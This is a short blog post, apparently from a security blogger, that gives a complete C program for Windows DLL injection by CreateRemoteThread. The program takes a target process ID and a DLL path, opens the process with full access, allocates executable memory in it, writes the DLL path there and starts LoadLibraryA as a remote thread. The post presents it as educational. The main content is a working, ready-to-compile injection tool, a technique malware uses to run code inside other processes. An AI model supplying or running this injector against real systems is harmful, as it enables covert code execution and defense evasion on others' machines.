In a previous post on DLL injection, I hardcoded the code for the DLL. In this post, I am giving you the opportunity to specify your process ID and DLL to be injected.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 | /* * DLL Injection - using create remote thread * This is a follow-up to my previous blog posts and as in the previous instance, * this is purely for educational purposes. * https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows_23.html * https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows.html * * In those previous posts, I required admin privileges. In this post, I'm working without admin privileges * Author Nik Alleyne * Author Blog: www.securitynik.com * File: dllInjection-CreateRemoteThread.c * Date: October 4, 2020 */ #include <windows.h> #include <Psapi.h> #include <stdio.h> int main(int argc, char* argv[]) { // Clear the screen before getting started system("cls"); // Check to see if the number of arguments, equals 3. // First argument is the program, second is the process PID and third is the full path to the DLL if (argc != 3) { printf(" ===========================================================================\n"); printf("[*] Usage info. | dllInjection-CreateRemoteThread.exe \n"); printf("[*]"); printf("dllInjection-CreateRemoteThread.exe PID Path to DLL \n"); printf("\t eg. dllInjection-CreateRemoteThread.exe 3000 c:\\tmp\\mydll.dll \n"); printf(" ===========================================================================\n"); return -1; } printf(" Beginning the DLL Injection Process ... \n"); printf("------------------------------------------------------------------------------ \n"); Sleep(1000); printf("[*] Enumerating all processes ... \n"); Sleep(1000); // Setup point to the array which will hold the processes DWORD myProcessList[4096], sizeOfArray, totalProcesses; if (!EnumProcesses(myProcessList, sizeof(myProcessList), &sizeOfArray)) { printf(" [!] Error Code: %u was encountered while retrieving processes information \n", GetLastError()); return -1; } // calculate the number of processes returned totalProcesses = sizeOfArray / sizeof(DWORD); printf(" [*] There were %u processes found \n", totalProcesses); Sleep(1000); printf("[*] Searching for process with PID:%u \n", atoi(argv[1])); // Create a variable to track if the PID was found BOOL pidFound = FALSE; // Find the process with PID of interest // first declare a counter for the array unsigned int count = 0; for (count; count < totalProcesses; count++) if (myProcessList[count] == atoi(argv[1])) { pidFound = TRUE; break; } if (!pidFound) { printf(" [!] Unable to locate the process with PID:%u \n", atoi(argv[1])); return -1; } printf(" [*] Process with PID:%u Found \n", atoi(argv[1])); Sleep(1000); // Now that the PID exists, open a handle to it. printf("[+] Opening a handle to process with PID:%u ...\n", atoi(argv[1])); HANDLE myRemoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1])); if (!myRemoteProcessHandle) { printf(" [!] Error %u occured while attempting to get a handle \n", GetLastError()); return -1; } printf(" [+] Handle 0x%p successfully opened \n", myRemoteProcessHandle); Sleep(1000); // Allocating space in memory printf("[+] Allocating space in the memory of process with PID: %u \n", atoi(argv[1])); VOID* myRemoteProcessAddress = VirtualAllocEx(myRemoteProcessHandle, NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!myRemoteProcessAddress) { printf(" [!] Unable to allocate space in the process. Error code was %u \n", GetLastError()); return -1; } printf(" [+] Space successfully allocated \n"); Sleep(1000); // Writing DLL Path to process Memory printf("[+] Writing to the process memory ... \n"); if (!WriteProcessMemory(myRemoteProcessHandle, myRemoteProcessAddress, argv[2], strlen(argv[2]), nullptr)) { printf(" [!] Error %u encountered while writing to the process with PID:%u memory \n", GetLastError(), atoi(argv[1])); return -1; } printf(" [+] Process memory successfully written ... \n"); Sleep(1000); // Executing the remote threat printf("[+] Creating the remote thread ...\n"); HANDLE myRemoteProcessNewThread = CreateRemoteThread(myRemoteProcessHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), myRemoteProcessAddress, 0, nullptr); if (!myRemoteProcessNewThread) { printf(" [!] Error occurred while creating remote thread!\n"); return -1; } printf(" [+] Remote thread successfully created \n"); Sleep(1000); // Close up shop CloseHandle(myRemoteProcessHandle); printf("[*] I'm done my work. See ya and hope you enjoyed that demo! \n"); return 0; } /* * References: * https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-modules-for-a-process * https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumprocesses * https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess * https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights * https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory * */ |
Have fun!
No comments:
Post a Comment